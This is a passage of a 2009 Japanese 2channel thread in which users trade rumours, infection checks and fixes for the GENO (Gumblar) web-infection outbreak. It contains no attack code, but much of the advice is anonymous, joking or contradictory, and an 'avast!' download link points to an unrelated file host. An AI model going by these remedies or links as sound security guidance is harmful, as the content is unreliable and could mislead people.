Safari Stable最新版
Googleの検索結果にGENO汚染されたサイトが入ってるだけでトロイが入ってこようとする。 とうとうGoogleも死亡か!?
>>143 それ検索先の先読みが有効になってるだけでないの
ドラッグすると感染するからドラッグするなよ!絶対だぞ!!! ?????? ?????? ??????
146 :
スズナ(不明なsoftbank) :2009/05/17(日) 20:05:50.69 ID:RiZu0qDk
情弱や一般人に感染するってのはポイント高いな ごく一部に感染するキンタマや山田みたいな人生オワタ系ウイルスじゃなくて サイト開いただけでウイルスに感染したらリカバリしなきゃやべぇ的なウイルス久しぶり杉ワロタ
147 :
レウイシア(大阪府) :2009/05/17(日) 20:06:24.41 ID:BGymQwQM
>>143 それはブラウザの先読み機能だろうから設定変えたらいい
>>143 感染してないか?
このウイルスはグーグル先生の結果を改ざんするらしいぞ
150 :
キュウリグサ(福岡県) :2009/05/17(日) 20:08:51.48 ID:QQkT0wna
結局要はアドビ更新すりゃいいんだよな?
152 :
サルトリイバラ(徳島県) :2009/05/17(日) 20:09:19.87 ID:8meLDzTj
>>149 Avast!が超絶反応してワロタwwwww
153 :
パキスタキス(catv?) :2009/05/17(日) 20:10:10.18 ID:H9i+P7OK
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
http://www.btfree.info/file.php?action-get.html Code by: 790e3cc3feabad9
>>150 とりあえず、その2つだけいいのではないでしょうか。
作業するのも大変でしょうし。
155 :
キュウリグサ(神奈川県) :2009/05/17(日) 20:10:55.91 ID:7I7g4Il2
先読み機能て何のためにあるのさ?
157 :
スズナ(滋賀県) :2009/05/17(日) 20:11:45.55 ID:QKFBMuEO
158 :
スズナ(東京都) :2009/05/17(日) 20:11:54.22 ID:VZD8/13g
ちょっくらプリフェッチの切り方纏めてくるか
159 :
キュウリグサ(福岡県) :2009/05/17(日) 20:12:09.87 ID:QQkT0wna
>>154 おk
じゃあ早速踏みまくってきますノシ
160 :
キブシ(東京都) :2009/05/17(日) 20:12:13.99 ID:lkGVu3aj
161 :
オダマキ(千葉県) :2009/05/17(日) 20:12:22.20 ID:YFgNxRDj
このスレいい加減実態が見えて来ないな・・
163 :
桜(福岡県) :2009/05/17(日) 20:13:04.07 ID:aKpz6ARH BE:1951790876-2BP(2)
>>157 なら、外付けHDDに世の中全てのキャッシュを保存すれば勝ち組だな
164 :
カラスビシャク(埼玉県) :2009/05/17(日) 20:13:13.78 ID:4sYNvOMI
>>156 Firefoxの先読みは有効のままで何も問題ないぞ
|:;:;:;:;:;:;:;:;:;:;:;:;:;:i;:;:;:;:;:;:;:;:;:;:;:;:;| |;:;:_:;:_:;:_:;:_;:;_:;:l:;_;:_:;:_:;:_:;:_;:_;| |______|_____| | 三| _ _ |三 ! | 三| 三シ ヾ三 |三 | | 三′ .._ ||||| _,,..u i三 | ト、ニ| <でiンヽ ;'i"ィでiン |三.| ', iヽ! 、 ‐' / !、 ーシ |シ,イ i,ヽリ u ,' : !. u |f ノ ヾ! ui ,、 ,..、ヽ__!_lノ | _ _ ゙ー┬、`ヽ、 l ,ィチ‐-‐fー'⌒,ラー- ヽ ゙i、 ゝ、二フ,ニ二j ,-ヽ \ ___ | \ ー一 ゙ー'7/ ハ 、 \_/ -ヽ ,ィ|、 \ /,二=-ヽ_ ゙、 ヽ^i-!:i _, イ | ヽ_ 二=''" `ー--、 ` ゙、 丿 !:|
Operaでやっといたほうがいい設定教えて
167 :
スズナ(大阪府) :2009/05/17(日) 20:15:22.24 ID:KALCxZA/
この手のまとめサイトは無駄に冗長になっててわかりにくいよな。
>>151 でいいと思うよ。
168 :
サンダーソニア(東京都) :2009/05/17(日) 20:16:28.30 ID:Qtky1iiK
まとめサイト作る人はまとめるのが下手な法則 仕方ない
169 :
スズナ(神奈川県) :2009/05/17(日) 20:16:33.68 ID:hU11AH+v
170 :
カラスビシャク(埼玉県) :2009/05/17(日) 20:17:04.10 ID:4sYNvOMI
まとめwiki重すぎワロタ 同人の方は軽すぎワロタ
ニコニコ感染マダァ〜
172 :
ヒサカキ(長屋) :2009/05/17(日) 20:17:28.26 ID:PpDa/RmV
いつも思うんだけど ネットつなげていて、毎日アップデートしないやつって何なの?
xpsp3 IE8の実験用Pen4機で踏んでこようかな
標的がOfficeじゃなくてアクロバットってのがニクいよね
666 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2009/05/17(日) 20:08:32.73 ID:9hjXkHlgO ニコニコ動画見ていた→パソコン電源落ちる→再起動でブルスク マジで助けて
176 :
シナノコザクラ(関東・甲信越) :2009/05/17(日) 20:20:12.80 ID:wumN8ppo
もう発生してない国に逃げるしかない。
>>172 俺みたいなめんどくさがりの低スペック使い
スタートアップとか、プロセスが少しでも多いと気になって仕方がない
いい加減PC買い換えたい・・・
このウィルスの報告で電源勝手に落ちるなんてあったか?
>>178 3マソくらいで買えるだろOSはDSP版でいいじゃねえか。
ならハードが逝きかけてるだけじゃね
多分過負荷で落ちたんだろ
185 :
ノミノフスマ(東京都) :2009/05/17(日) 20:23:19.99 ID:LvrhtoYy
avast!は効果ありますか?
オミトロンってJavascriptはチェックできるの?
187 :
レブンコザクラ(和歌山県) :2009/05/17(日) 20:23:29.59 ID:38AdChwb
188 :
スズナ(東京都) :2009/05/17(日) 20:23:39.03 ID:VZD8/13g
189 :
カラスビシャク(埼玉県) :2009/05/17(日) 20:24:08.13 ID:4sYNvOMI
190 :
サンシュ(東京都) :2009/05/17(日) 20:24:16.98 ID:TVbfxF0n
>>162 一応それっぽいウィルスが出回ってるのは事実みたいだな
ソースはマカフィ
使ってよかったfoxitReader
>>181 すでに友人に金借りてる状況であらたに物買う気にならん。
今月分で完済予定だがな
ていうかたぶん高スペックになってもこの貧乏性は直んないと思う。
大学のときにオンボロメーカー製PC使ってたときに付いた癖だから
194 :
ショウジョウバカマ(三重県) :2009/05/17(日) 20:24:59.08 ID:M5Qp0TJq
195 :
タニウズキ(神奈川県) :2009/05/17(日) 20:25:00.79 ID:RddtXoK4
196 :
エニシダ(埼玉県) :2009/05/17(日) 20:25:12.83 ID:VR+xQIpK
ぶっちゃけもう飽きてきた
FTPってなんだ?
198 :
オオニワゼキショウ(アラバマ州) :2009/05/17(日) 20:25:41.69 ID:jAg50msa
どうしたらいいのか分からん
avast広めるのはいいけど 一応シャットダウンの不具合も書いておいた方がいいんじゃ? 後ライセンスキーの事も
FoxitもScriptオフにしとけよ
201 :
シャクヤク(東京都) :2009/05/17(日) 20:26:38.53 ID:l0juqGkS
どうやるのさ
202 :
ホトケノザ(コネチカット州) :2009/05/17(日) 20:26:47.56 ID:s2pS2D1S
>>191 Foxitでも設定でjava切っとけよ
204 :
サルトリイバラ(徳島県) :2009/05/17(日) 20:27:04.07 ID:8meLDzTj
シャットダウンの不具合についてKWSK
205 :
水芭蕉(北海道) :2009/05/17(日) 20:27:15.92 ID:rKFs3Epf
>>184 接続関係だし、落ちることはあまりないかなあ。
過負荷かあったかくなってきたからPCの掃除不足かな。
>>188 現状ではChromeより、Ironのほうがよくね?
あれ?結局ニフとか言ってたのはガセだったの?
なんか頭痛と鼻水が出てきた。 悪寒がするし、おなかも今朝から下痢っぽいし。 なんだろな…orz
211 :
タニウズキ(神奈川県) :2009/05/17(日) 20:29:06.77 ID:RddtXoK4
成美堂出版は、トップページじゃなく、トップページからscript src=で呼び出してるjsファイルに ウイルス埋め込まれてるのか
ついにPC→ヒト間に変異したか・・・
213 :
スズナ(東京都) :2009/05/17(日) 20:29:22.33 ID:VZD8/13g
flashplayerとpdfreaderも自動アップデートさせてればこんなことにならんかった 明らかに市場独占してるadobeの怠慢
>>208 ニフはガセ、らしい
とりあえず各種アップデートやっといたから大丈夫だおる。たぶん
プロセスチェックだけはかかさずやっとこう
218 :
レブンコザクラ(和歌山県) :2009/05/17(日) 20:33:02.15 ID:38AdChwb
早くニコニコに感染させろ
219 :
チドリソウ(関東) :2009/05/17(日) 20:33:11.63 ID:DyBbXwC5
空のゼロックスフォルダがあるんだが… しかも削除できない…
221 :
チチコグサ(関西・北陸) :2009/05/17(日) 20:33:59.80 ID:dOCZTSgn
感染したらどうなんの
ゼロックスではなくてxeroxってかけよそこは
ゼロックスって聞くとMtG思い出す。
224 :
チドリソウ(関東) :2009/05/17(日) 20:35:37.75 ID:DyBbXwC5
どうすりゃいいのよ PC知識ゼロの俺にはわからん
225 :
スズナ(滋賀県) :2009/05/17(日) 20:35:59.84 ID:QKFBMuEO
226 :
オダマキ(千葉県) :2009/05/17(日) 20:36:21.43 ID:YFgNxRDj
UACって何かプログラム起動するとでてくるけどウイルスと何の関係があるんだ? 成美堂出版にアクセスしたらいきなりでてくるのか?
228 :
藤(千葉県) :2009/05/17(日) 20:36:43.52 ID:jX9Tf4eo
229 :
レブンコザクラ(和歌山県) :2009/05/17(日) 20:36:56.66 ID:38AdChwb
今回はタスクマネージャーのプロセスで「これがあったらアウト」ってのはないんだな
>>221 GENO感染時の症状
sqlsodbc.chmを改変
cmd.exe、regedit.exeが起動不能
一部のアンチウイルスソフトが更新不能
特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
Googleの検索結果を改竄(リンクを弄る)
explorer.exeや一部のブラウザが異常終了
Acrobatが勝手に起動
PDFファイルやシステムファイルが増殖
CPU、メモリ使用率がUP
再起動時にBSOD
らしい
231 :
スズナ(東京都) :2009/05/17(日) 20:37:32.43 ID:yo6/k/EH
各セキュリティーベンダーの対応状況は?
233 :
プリムラ・ビオラケア(関西地方) :2009/05/17(日) 20:37:49.03 ID:CGz5lqbx
234 :
キュウリグサ(神奈川県) :2009/05/17(日) 20:38:27.05 ID:7I7g4Il2
236 :
チドリソウ(関東) :2009/05/17(日) 20:39:09.98 ID:DyBbXwC5
まあいいか ノートンが対応するまで待とうっと
237 :
アブラチャン(神奈川県) :2009/05/17(日) 20:39:48.20 ID:KrE+f874
>>134 感染したと思われるw2kでコマンドプロンプトは起動したな。regeditも
ノートンまだ対応してねーのかよ 夕方頃「ノートン対応ktkr」とか書き込んでる奴いたのに
これってファイルをどうこうするウイルスじゃないみたいだから 最悪感染した後でも別システムで起動すればバックアップは取れるよね
ニフティがプロバイダごと感染して会員全滅ってスレ立ってるけどマジ?
>>227 ウィルスコード実行するとPDFなんかがクラッシュしたあと、マルウェアがシステムドライブにアクセスしようとする。
UACオンにしてるとそこで止まる。
そもそもVistaだとウィルスコード実行されないけどね。
243 :
スズナ(滋賀県) :2009/05/17(日) 20:40:55.98 ID:QKFBMuEO
ZEROがきっちりと弾きました! ってなるといいなあ
>>244 きちんとTempフォルダにダウンロードしてから検査するから大丈夫
247 :
ナツグミ(長野県) :2009/05/17(日) 20:42:00.91 ID:b1hK7AAL
AVGって弾きますか?
248 :
キュウリグサ(神奈川県) :2009/05/17(日) 20:42:29.66 ID:7I7g4Il2
>>232 Avast! が検知するだけ。
対策はクリーンインストールのみ。
249 :
タチツボスミレ(静岡県) :2009/05/17(日) 20:42:30.48 ID:OUWbXyvU
flashplayerってどうやってアップデートするんだろ むしろflashplayerが入ってるのかどうかすらわからないんだが…
つーかマジAdobeに突撃した方がいいと思うんだが
251 :
ハナビシソウ(愛知県) :2009/05/17(日) 20:43:07.28 ID:Qj6zykip
このウィルスで騒いでるのってニュー速だけ?
>>243 良かった、流石にそりゃねーよ会員に訴えられるぞって思ったわ
ノートン2009のLiveアップデートすると、デバイスマネージャーで表示されるネットワークアダプタの末尾に Symantec Network Security Miniportっていうのが!マーク付きで表示されて ネットができなくなるんだけど。 調べたら対応策なしとか書いてあってオワタ。 アップデートできないとか俺死ぬの?GENOウイルス感染待ちなの?
256 :
シラネアオイ(コネチカット州) :2009/05/17(日) 20:45:33.98 ID:zKxuAo6l
>>251 そもそも一般ユーザーは気付いていない
知らないで再起動>ブルスク
気付いた者が生き残れる
258 :
タチツボスミレ(静岡県) :2009/05/17(日) 20:46:07.14 ID:OUWbXyvU
>>252 ありがとう
なんかAdobeFlashPlayer10ActiveXってのがはいtってこわすぎ
adobereader入れてないから安心だ
260 :
モリシマアカシア(埼玉県) :2009/05/17(日) 20:46:29.72 ID:lYqC6EsV
昔、FLASHの関連付けを切って元に戻せなくなったw アホだなぁ、俺
261 :
プリムラ・インボルクラータ(東京都) :2009/05/17(日) 20:46:43.81 ID:K7aK26c4
262 :
藤(山梨県) :2009/05/17(日) 20:46:47.80 ID:Ave0Vl0J
>>199 > 一応シャットダウンの不具合も書いておいた方がいいんじゃ?
> 後ライセンスキーの事も
kwsk
>>257 サイトにアクセスするだけだからウィルスって事にすら気づかないだろうしな
正に情弱涙目
265 :
スイカズラ(北海道) :2009/05/17(日) 20:47:39.34 ID:4JancLQY
糞だ。 重い重い。 そう言われても信じてNoScript入れてた俺の大勝利
266 :
スズナ(東京都) :2009/05/17(日) 20:47:40.92 ID:VZD8/13g
267 :
チドリソウ(関東) :2009/05/17(日) 20:48:22.82 ID:DyBbXwC5
なんだノートンも対応してるし、ゼロックスフォルダも心配いらないみたいね
Flashの最新は10.0.22.87
sqlsodbc.chmの更新日が一年前だしcmd、regedit共に起動するから 感染してないはずだけど怖くて再起動できない 誰か俺を安心させてν速のみんな
270 :
モリシマアカシア(関西地方) :2009/05/17(日) 20:49:48.89 ID:+MGVg9A6
>>265 何も苦労せずにスクリプトだけじゃなくてflashも自由自在に切り替えられるOpera民は大大大大
月曜日からが地獄だな。 出社してきたサイト管理者が迂闊にGENOウイルスサイト踏んで感染したら、大変なことになる。 きっとニュースで迂闊な月曜日とか言われて、大騒ぎになるぜ。
273 :
オウバイ(神奈川県) :2009/05/17(日) 20:50:54.87 ID:CMCRgCxl
>>258 つか、アド( ゚д゚)、ペッぐらいお気に入りに入れとけ。
274 :
ハナビシソウ(愛知県) :2009/05/17(日) 20:51:10.58 ID:Qj6zykip
よくわからん 俺感染してないしなんかウソくせー
275 :
トリアシスミレ(アラバマ州) :2009/05/17(日) 20:52:20.46 ID:WkUhbFeV
確かにadobeにも責任はあるかもな。
277 :
カラスビシャク(埼玉県) :2009/05/17(日) 20:52:48.27 ID:4sYNvOMI
>>265 つい最近はマルウェア的な動作があって叩きに叩かれたもんだがな
>>270 Flashもjsで動かしてるのにアホだなおまえ
>>274 こういうウィルスは君みたいな真偽確かめれない情弱から感染していくんだぜ
280 :
キクバクワガタ(広島県) :2009/05/17(日) 20:54:43.01 ID:81YzY69Q
同人ってキモオタのサイトだろ?wどうでもいいわ
281 :
オランダミミナグサ(長屋) :2009/05/17(日) 20:54:54.99 ID:JmDW7GMT
>>269 とりあえず最悪の事考えて残したいで゛ー他は退避させてから再起動
282 :
マンネングサ(埼玉県) :2009/05/17(日) 20:55:20.78 ID:bdMTxhpe
283 :
アズマギク(滋賀県) :2009/05/17(日) 20:56:10.52 ID:+nbbjxd2
これ感染してたら再起動かけた時に発動すんの? まとめ見られないんだが
284 :
ハクモクレン(大阪府) :2009/05/17(日) 20:56:26.86 ID:gRfr6Ape
アクロバット入れてなけりゃOKなんじゃないの?
285 :
福寿草(埼玉県) :2009/05/17(日) 20:56:27.96 ID:2qxZUYZb
で、チミたちVista買うの? 7が出るまでインターネット辞めるの?
286 :
ヤエザクラ(東京都) :2009/05/17(日) 20:56:40.77 ID:wVHhXxdG
未だに感染していないオイラは運が良かっただけなのか? とりあえず、まとめのウィルス確認して全部セーフだった ニコニコとか動画サイトいくつか見ちゃったけど、これからは用心だな
ふたばとにちゃんしか開かない俺に死角はなかった
>>269 新しいPCとOSを買えばいい。
これで解決。
289 :
プリムラ・インボルクラータ(東京都) :2009/05/17(日) 20:57:45.39 ID:/eSNuI8m
「pdfはブラクラ」ってのはほんとのことだったのだなあ
290 :
スズナ(滋賀県) :2009/05/17(日) 20:58:04.02 ID:QKFBMuEO
291 :
カラスビシャク(埼玉県) :2009/05/17(日) 20:58:20.90 ID:4sYNvOMI
同人板マジおもしれえ
292 :
マンネングサ(埼玉県) :2009/05/17(日) 20:58:32.22 ID:bdMTxhpe
ノートン先生対応きた?
今更Vistaなんて買うわけがねえ
294 :
ハンショウヅル(関西・北陸) :2009/05/17(日) 20:59:09.42 ID:sFHwsOG2
キモヲタのネット内での行動力は異常
295 :
オウバイ(神奈川県) :2009/05/17(日) 20:59:36.28 ID:CMCRgCxl
>>285 ケーブルTVとADSLの2回線で2系統の環境構築しているから
問題ないね。流出しても平気w
7まで待つよ。
母艦でやらずにクリーンインストールした骨董サブノートでしばらく生きるわ
298 :
バラ(岩手県) :2009/05/17(日) 21:01:04.00 ID:1HlFXFRg
2chが感染したら2chブラウザでもあうあう?
299 :
イヌノフグリ(秋田県) :2009/05/17(日) 21:02:22.91 ID:ATO6mXtL
幸いにもウイルス無かったが、しばらくエロサイトめぐりは自粛だなあ・・・・
301 :
ムラサキハナナ(大阪府) :2009/05/17(日) 21:02:57.05 ID:vWb4YxuA
とりあえず最新版にしてりゃ感染サイト見ても大丈夫なんだろ? 馬鹿馬鹿しいからもうネットサーフィン再開するわ 貴重な休日潰れたわ
>>237 2000はGENOウイルスに感染しないのでは?
違うのですか?
303 :
タチツボスミレ(静岡県) :2009/05/17(日) 21:04:04.12 ID:OUWbXyvU
Avast Professionalユーザの俺様大勝利だな
>>301 XPなんか使ってるから丸1日無駄にする
時間は貴重だろ?
306 :
桜(福岡県) :2009/05/17(日) 21:08:46.67 ID:aKpz6ARH BE:371769942-2BP(2)
carwash踏んでから再起動したけどなんもなかった
とりあえず家計簿にしかつかってなかったvistaノートを使うことにするか…。
バスターさん、IE8対応してないってマジかよ 家族のPCのブラウザIE8にしちゃったよ… 自分は火狐だけど どうしようかね
正直インフルエンザのウィルスより怖いわ(神戸在住)
会社のPCでしばらくネットサーフィン禁止にしたほうがいいかな 昼休憩とかも
311 :
キンケイギク(千葉県) :2009/05/17(日) 21:09:58.27 ID:o01Paw4J
vista厨ウゼーよ 無駄に煽んなボケ
>>303 ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
涙目すなぁ^^
314 :
オオイヌノフグリ(ネブラスカ州) :2009/05/17(日) 21:11:57.74 ID:Ucr7r1sY
315 :
オオタチツボスミレ(福岡県) :2009/05/17(日) 21:14:52.49 ID:IaeRH/Ob
PC上級者の俺でも分からないのが 「ウイルスが進化した」っていうけど、 これは伝染していく間に勝手に「進化」するのではなくて 誰かが故意に「進化」させたっていうことで桶?
316 :
ホトケノザ(長崎県) :2009/05/17(日) 21:15:31.66 ID:Tr4vzbvG
おkでしたwww 【感染の確認方法】 @cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。 ■確認方法 1.スタートから「ファイル名を指定して実行」 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に 「regedit.exe」と入力して「OK」ボタンを押す。 ※立ち上がったことを確認したら弄らず閉じること。 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す ※立ち上がったことを確認したらAへ Asqlsodbc.chmのファイルサイズの確認を確認する ■Windows XP: 改ざんされていなければ C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes ■Windows 2000: そもそも存在しないはずなので、 C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。 ■確認方法 1.スタートから「ファイル名を指定して実行」 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に 「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す →背景が黒いウィンドウが開いた場合3へ →起動しない場合:感染疑い濃厚 3.背景が黒いウィンドウを選択。 小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
317 :
ショウジョウバカマ(コネチカット州) :2009/05/17(日) 21:15:38.49 ID:ooPy6cmt
てかっ、 電源オフや再起動したらアカンのかよOrz 今日は徹夜かよ
VISTAだけど邪魔だからUACなんて切ってたぞ糞が
319 :
フクシア(神奈川県) :2009/05/17(日) 21:16:57.37 ID:cZ85gIrd
一ヶ月くらい起動してないサブPCを更新のために起動するべきか脅威が去るまで放置するべきかうーん
320 :
キュウリグサ(神奈川県) :2009/05/17(日) 21:17:02.82 ID:7I7g4Il2
>>266 今のところ消す方法は無い。
hostsをいじって収集サイトへのアクセスを遮断する方法はあるけど、収集サイトがいつ変わるかわからんから気休め。
気をつけていても安全そうな所でもウイルスに感染している可能性があって、 しかも検出不可なので感染したのにも分からず、 感染したのが気がついたら時既に遅しでもはや再インストールしか道が無いとは。 はんぱねーな。
>>315 そうね
変異はウィルス自身の機能として持たせることも出来るが
323 :
福寿草(埼玉県) :2009/05/17(日) 21:17:59.67 ID:2qxZUYZb
>>318 今から入れればいいじゃない。
あと厨ソフトでUAC時の画面暗転切るのも御法度な。
324 :
レウイシア(大阪府) :2009/05/17(日) 21:18:23.24 ID:BGymQwQM
325 :
タチツボスミレ(静岡県) :2009/05/17(日) 21:19:11.34 ID:OUWbXyvU
胃が痛くなってきた
326 :
ミヤマヨメナ(アラバマ州) :2009/05/17(日) 21:19:19.55 ID:CR84eHIv
vistaから7に無償で移行できるってスレ見てちょっとvista入れようかとも思ったけど、 あれって既存のユーザーが対象になるのか分からないんだよね?
sqlsodbc.chmの容量がメインも仮想PCも半年くらいネットつなげてないのも50,727バイトじゃないんだけどどうなってるんだ
>>300 のチェッカーでは大丈夫だって出てるけど
328 :
オウレン(埼玉県) :2009/05/17(日) 21:20:18.29 ID:3UODKY+n
329 :
モリシマアカシア(埼玉県) :2009/05/17(日) 21:20:52.13 ID:lYqC6EsV
とりあえず寝るわ 寝たら治るだろ
>>326 多分プリンストールモデルはスルーかも。
でも割安でメーカーがアップグレードプログラム用意してくれるかもね。
メーカー次第だけど。
>>300 の感染確認batファイルをデスクトップにでも置いておけば
いつでも簡単に確認できるから落としておくことを強く勧めます。
333 :
チドリソウ(関東) :2009/05/17(日) 21:23:18.48 ID:t0SzZMWL
キンタマウイルスとは方向性が違うが、潜伏っぷりと対処法が嫌過ぎる 誰だよ作った奴
334 :
オキザリス(東京都) :2009/05/17(日) 21:23:45.79 ID:OT2LLMTM
>>264 へたにサイトを運営していたり、自宅に仕事を持って変えたっりしていて
FTPでファイル更新をして、そしてそのサイトもウイルス配布サイトに。
これは暫く止まりそうもないな。
336 :
ムラサキハナナ(大阪府) :2009/05/17(日) 21:26:49.36 ID:vWb4YxuA
知らない奴だけが問題なんだろ ここで騒いでてやるだけやった奴はもう安心だろ
337 :
マツバウンラン(岡山県) :2009/05/17(日) 21:27:13.15 ID:kRX/rFYX
338 :
センダイハギ(アラバマ州) :2009/05/17(日) 21:27:23.57 ID:OyHCHJOU
今Vistaのパソコン買っても2年ぐらいでもうサポート期間終わっちゃうんだろ? ひどすぎ 買えねーじゃん
339 :
オウレン(埼玉県) :2009/05/17(日) 21:27:28.16 ID:3UODKY+n
同人板糞ワロタ 881 GENO[sage] 2009/05/17(日) 21:25:49 ID:oUobyklU0 [New] 火狐が扱いにくそうだと感じたらOperaでもおk IEコンポーネントだっけ?をつかってるからサイト見るときもIEで見るのと変わらないらしいよ あとこのスレ的にはOperaのほうがお勧めみたい
>>333 つーか、これでキンタマみたいな症状だったらって考えただけでも恐ろしいよな
342 :
サイネリア(関東・甲信越) :2009/05/17(日) 21:28:25.92 ID:NrIozNFe
アドベをアンインストールしたら感染サイトに突っ込んでも平気なんだろ?
344 :
ヒマラヤユキノシタ(山陰地方) :2009/05/17(日) 21:28:40.46 ID:72kAzcv0
345 :
モリシマアカシア(関西地方) :2009/05/17(日) 21:29:15.15 ID:+MGVg9A6
この際プニル厨と火狐ねとらん厨はOperaにしとけ
346 :
カンガルーポー(東日本) :2009/05/17(日) 21:29:39.48 ID:2tzVhWwD
347 :
スズナ(埼玉県) :2009/05/17(日) 21:30:18.12 ID:4QuIVfhI
>>344 youtubeのリンク
危険度7%
安全なURLです。踏んでも大丈夫でしょう。
評価ミス報告
IE8だとどこ行っても感染しないっぽいな IE7以下でもjscript.dllを差し替えるだけでも回避できそうに思えるがどうなんだろう
349 :
シデコブシ(関東・甲信越) :2009/05/17(日) 21:30:36.11 ID:kFidMo1H
>>309 逆じゃね?(笑)
弱毒性のインフルエンザウイルスより、
ある意味GENOのが怖いだろ(笑)
350 :
タチツボスミレ(静岡県) :2009/05/17(日) 21:30:37.25 ID:OUWbXyvU
JaneDeoStyleでこのスレ見てる奴 感染してるぞ
>>334 仕事のデータFTPでやりとりするアホは死ぬべき
352 :
マンネングサ(埼玉県) :2009/05/17(日) 21:31:32.90 ID:bdMTxhpe
症状的には、キモオタにとっちゃキンタマの方が嫌じゃないか? 性癖等のハイド氏を不特定多数に公開されるわけだから。 GENOは晒し系じゃないだけマシ。 あと似非キンタマなんかは感知されない場合が多いから、 潜伏っぷりに関しても嫌らしいと思う。
353 :
モリシマアカシア(関西地方) :2009/05/17(日) 21:31:57.85 ID:+MGVg9A6
>>277 あ?
flashだけ無効にできるの
そんでjavascriptは本来全くコンピューターに損害与えようがない拡張だから、安心してjavascript付きのWeb巡回ができる
flashを防ぎたいがために便利なjavascriptを犠牲にしなくてはならない火狐はカス、プニルは論外
354 :
モリシマアカシア(関西地方) :2009/05/17(日) 21:32:22.75 ID:+MGVg9A6
∴Opera最強定理は示された
355 :
ミヤマヨメナ(アラバマ州) :2009/05/17(日) 21:33:16.60 ID:CR84eHIv
うぃきは大丈夫なの? vistaでのチェック方法は?
現時点だとVISTAが鉄壁の防御力を誇っているな。 ※UACをONにしている場合に限る
VistaだけどAdobeのFLASHとReaderをダウンロードしかしてないんだが他に特になにもしなくてよさげ? PCの知識皆無だからよくわからん、再起動は普通に出来たから感染はしてないと思うが・・・
359 :
オキザリス(東京都) :2009/05/17(日) 21:34:21.15 ID:OT2LLMTM
>>351 そんなサーバの使い方をしている企業が、まだまだ沢山ある。
SFTPって何?とか言って、サーバは未だにRH7とか。
2002年から一切更新されてないSmabaも動いてるWEBサーバとか
IP認証をかけずにTELNET許可してるサーバなんてのも、数え切れないよ。
360 :
ハナビシソウ(愛知県) :2009/05/17(日) 21:34:22.36 ID:Qj6zykip
sqlsodbcの容量が46kbしかなくてチェックツールに怒られたけど、 そもそも英語版ヘルプだから問題じゃないだろうな。
363 :
マンネングサ(埼玉県) :2009/05/17(日) 21:35:55.75 ID:bdMTxhpe
>>353 flash無効化ってどうやるん? “アニメーションを有効にする”のチェックを外せばいいの?
この煽り方だと大丈夫みたいだな
ウイルス?なにそれ?怖い!って腐女子が大騒ぎしてるだけだろ 実際感染しても最悪ブルーバックくらいだし 対策も容易。そこまで騒ぐ意味が分からん
>>359 RH7の頃でさえ標準でtelnet無効かつSSH動いてなかったかw
まあ、90年代の運用やってるところは滅びればいいよ
3,4日前までいっぱいあったXP厨の 「VistaでもこのVirusには安全じゃない、XP最高ぅうううう」な論調が全くなくなったのが笑える
368 :
スズナ(福井県) :2009/05/17(日) 21:40:41.08 ID:aThEtNN3
しばらく2ch以外のネットはPS3で見るかw
369 :
クロッカス(群馬県) :2009/05/17(日) 21:41:24.45 ID:xQoWzUmZ
今回の件に限らず不具合とか検出率の面ではバスターとノートンどっちがおすすめ?
もっててよかったPS3
>>362 ありがとう
感染してたらどうなるんですか?
感染してたら右側の規定がでてこなかったりしますか?
ちなみにvistaでUACは外してないみたいです
>>353 火狐でもAdblockで*.swfと指定すりゃflash弾くことできるんだが
にフ騒ぎと良いヌ即も同人とどっこいじゃねえ?w ここ見てると同レベル
Flash無効にすれば大丈夫なの? 一応火狐にFlashblockっていうアドオンあるからこれ入れたら無効化できるけど
375 :
キュウリグサ(神奈川県) :2009/05/17(日) 21:43:05.52 ID:7I7g4Il2
>>365 情報抜かれるのが困るんだよ
クレカの番号とかネットバンキングのパスワードとか
376 :
ムラサキケマン(東日本) :2009/05/17(日) 21:43:09.78 ID:8saPFtNI
K's電気でPCを購入しました。 HDDが壊れた時用+別PC用にOSのCDをくれと何度も言ったのですが HDDに入っているからそれをコピーすれば良いと言われ突き放されました。 OSの抽出の方法がわからず、今回、HDDを新規購入のデスクトップ(OSなし)に移そうと考え、色々検索してみたのですが HDDをイメージ化するソフトとHDDをUSB接続するハードとケーブルを別途購入しなければならないのでしょうか?
377 :
スズナ(富山県) :2009/05/17(日) 21:44:44.30 ID:XPSr7GqC
>>371 こんなメッセージがでます。
GENOウィルスに感染している恐れがあります。
直ちにこの端末をスタンドアロンにして、
必要なファイルをバックアップ、ウィルスの駆除またはOSのリカバリを推奨します。
俺が初期に感染したときは再起動しても問題なかったぞ cmdが勝手に動いてたから異常なのはすぐわかったけど
382 :
ショウジョウバカマ(catv?) :2009/05/17(日) 21:50:32.98 ID:KsTlzNMq
383 :
